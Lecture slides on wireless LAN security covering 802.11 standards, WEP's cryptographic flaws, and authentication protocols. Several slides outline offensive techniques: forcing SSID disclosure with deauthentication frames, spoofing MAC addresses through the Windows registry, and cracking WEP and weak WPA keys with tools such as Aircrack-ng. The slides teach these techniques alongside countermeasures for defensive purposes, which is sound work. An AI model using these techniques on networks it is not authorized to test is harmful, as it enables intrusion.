1. By : Septafiansyah Dwi Putra ITB

2. Radio Frequency Basics Mobile telephony Cellular Digital Packet Data (CDPD) Private data networks Bluetooth 3G Etc

3. Immediate communication, mobile user Two-way, interactive Broadcast Convenience Bandwidth limitations Roaming (no fixed location)

4. A wireless LAN or WLAN is a wireless local area network that uses radio waves as its carrier. The last link with the users is wireless, to give a network connection to all users in a building or campus. The backbone network usually uses cables Wireless LANs operate in almost the same way as wired LANs, using the same networking protocols and supporting the most of the same applications.

5. The wireless LAN connects to a wired LAN There is a need of an access point that bridges wireless LAN traffic into the wired LAN. The access point (AP) can also act as a repeater for wireless nodes, effectively doubling the maximum possible di

6. 802.11a offers speeds with a theoretically maximum rate of 54Mbps in the 5 GHz band 802.11b offers speeds with a theoretically maximum rate of 11Mbps at in the 2.4 GHz spectrum band 802.11g is a new standard for data rates of up to a theoretical maximum of 54 Mbps at 2.4 GHz.

7. Wired Equivalent Privacy (WEP) A protocol to protect link-level data during wireless transmission between clients and access points. Services: Authentication: provides access control to the network by denying access to client stations that fail to authenticate properly. Confidentiality: intends to prevent information compromise from casual eavesdropping Integrity: prevents messages from being modified while in transit between the wireless client and the access point.

8. Means: Based on cryptography Non-cryptographic Both are identity-based verification mechanisms (devices request access based on the SSID Service Set Identifier of the wireless network).

9. Authentication techniques

10. Cryptographic techniques WEP Uses RC4 symmetric key, stream cipher algorithm to generate a pseudo random data sequence. The stream is XORed with the data to be transmitted Key sizes: 40bits to 128bits Unfortunately, recent attacks have shown that the WEP approach for privacy is vulnerable to certain attack regardless of key size

11. Data integrity is ensured by a simple encrypted version of CRC (Cyclic Redundant Check) Also vulnerable to some attacks

12. Security features in Wireless products are frequently not enabled. Use of static WEP keys (keys are in use for a very long time). WEP does not provide key management. Cryptographic keys are short. No user authentication occurs only devices are authenticated. A stolen device can access the network. Identity based systems are vulnerable. Packet integrity is poor.

13. 3Com Dynamic Security Link CISCO LEAP - Lightweight Extensible Authentication Protocol IEEE 802.1x Port-Based Network Access Control RADIUS Authentication Support EAP-MD5 EAP-TLS EAP-TTLS PEAP - Protected EAP TKIP - Temporal Key Integrity Protocol IEEE 802.11i

14. Windows Wireless NIC drivers are easy to get Wireless hacking tools are few and weak Unless you pay for AirPcap devices or OmniPeek Linux Wireless NIC drivers are hard to get and install Wireless hacking tools are much better

15. For Linux, the best chipsets to use are Orinoco, Prism2.x/3, Atheros, and Cisco A good resource is at Madwifi Go to http://madwifi-project.org/wiki/Compatibility

16. Service Set Identifier (SSID) An identifier to distinguish one access point from another Initialization Vector (IV) Part of a Wired Equivalent Privacy (WEP) packet Used in combination with the shared secret key to cipher the packet's data

17. SSID can be found from any of these frames Beacons Sent continually by the access point (unless disabled) Probe Requests Sent by client systems wishing to connect Probe Responses Response to a Probe Request Association and Reassociation Requests Made by the client when joining or rejoining the network If SSID broadcasting is off, just send adeauthentication frame to force a reassociation

18. Each MAC must be entered into the list of approved addresses High administrative effort, low security Attacker can just sniff MACs from clients and spoof them

19. In Windows, just select it from the available wireless networks Click on set up a wireless network from a home or small office. And then input the SSID

20. In Windows Vista Rund regedt32 Navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlCla ss{4D36E972-E325-11CE-BFC1-08002BE10318} Find REG_SZ name NetworkAddress and change it SMAC is easier

21. Many Wi-Fi cards allow you to change the MAC in Windows' Device Manager

22. Brute-force keyspace takes weeks even for 40-bit keys (use Cain & Abel) Collect Initialization Vectors, which are sent in the clear, and correlate them with the first encrypted byte This makes the brute-force process much faster

23. Aircrack-ng or AirSnort (old) kismet Cain & Abel WLAN-Tools DWEPCrack WEPAttack Cracks using the weak IV flaw Best countermeasure use WPA/WPA2

24. This demo is conducted in my home Network configuration. Linksys Access point WEP 64 bit key Passcode ??? SSID DIJIANG

25. WPA/WPA2 is strong No major weaknesses However, if you use a weak Pre-Shared Key, it can be found with a dictionary attack Tool: Aircrack-ng

26. Change the default setting Filtering MAC Address 100% safe = imposible